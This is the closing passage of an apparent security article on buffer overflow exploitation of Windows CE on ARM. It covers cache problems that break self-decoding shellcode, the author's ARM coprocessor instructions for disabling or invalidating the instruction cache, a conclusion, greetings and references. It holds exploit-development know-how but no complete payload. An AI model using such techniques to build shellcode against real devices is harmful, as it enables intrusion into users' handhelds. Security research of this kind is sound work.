    said he has used this method successfully on an ARM system (I think his
    environment may be Linux). This method also works on AIX PowerPC and
    Solaris SPARC (I've tested it). But SWI is implemented differently under
    Windows CE. armtrap.s contains the implementation of SWIHandler, which
    does nothing except 'movs pc,lr'. So it has no effect after decoding has
    finished.

    Because Pocket PC applications run in kernel mode, we have the privilege
    to access the system control coprocessor. The ARM Architecture Reference
    Manual describes the memory system and how to handle the caches via the
    system control coprocessor. After reading the manual, I tried to disable
    the instruction cache before decoding:

    mrc     p15, 0, r1, c1, c0, 0
    bic     r1, r1, #0x1000
    mcr     p15, 0, r1, c1, c0, 0

    But the system froze when the mcr instruction was executed. Then I tried
    to invalidate the entire instruction cache after decoding:

    eor     r1, r1, r1
    mcr     p15, 0, r1, c7, c5, 0

    But that had no effect either.


    --[ 11 - Conclusion

    The code discussed above is a real-life buffer overflow example on
    Windows CE. It is not perfect, but I think this technique will be
    improved in the future.

    Because of the cache mechanism, the decoding shellcode is not good enough
    yet.

    Internet and handheld devices are growing quickly, so threats to PDAs and
    mobiles are becoming more and more serious. And patching Windows CE is
    more difficult and dangerous for customers than patching the normal
    Windows system. Because the entire Windows CE system is stored in ROM,
    you must flash the ROM if you want to patch system flaws, and the ROM
    images of the various vendors or models of PDAs and mobiles aren't
    compatible.


    --[ 12 - Greetings

    Special greets to the dudes of XFocus Team, my girlfriend, the life will
    fade without you.
    Special thanks to the Research Department of NSFocus Corporation, I love
    this team.
    And I'll show my appreciation to 0dd members, Nasiry and Flier too, the
    discussions with them were nice.


    --[ 13 - References

    [1] ARM Architecture Reference Manual
        http://www.arm.com
    [2] Windows CE 4.2 Source Code
        http://msdn.microsoft.com/embedded/windowsce/default.aspx
    [3] Details Emerge on the First Windows Mobile Virus
        - Cyrus Peikari, Seth Fogie, Ratter/29A
        http://www.informit.com/articles/article.asp?p=337071
    [4] Pocket PC Abuse - Seth Fogie
        http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-fogie/bh-us-04-fogie-up.pdf
    [5] misc notes on the xda and windows ce
        http://www.xs4all.nl/~itsme/projects/xda/
    [6] Introduction to Windows CE
        http://www.cs-ipv6.lancs.ac.uk/acsp/WinCE/Slides/
    [7] Nasiry's way
        http://www.cnblogs.com/nasiry/
    [8] Programming Windows CE Second Edition - Doug Boling
    [9] Win32 Assembly Components
        http://LSD-PL.NET

  • Original article: https://www.cnblogs.com/nasiry/p/216668.html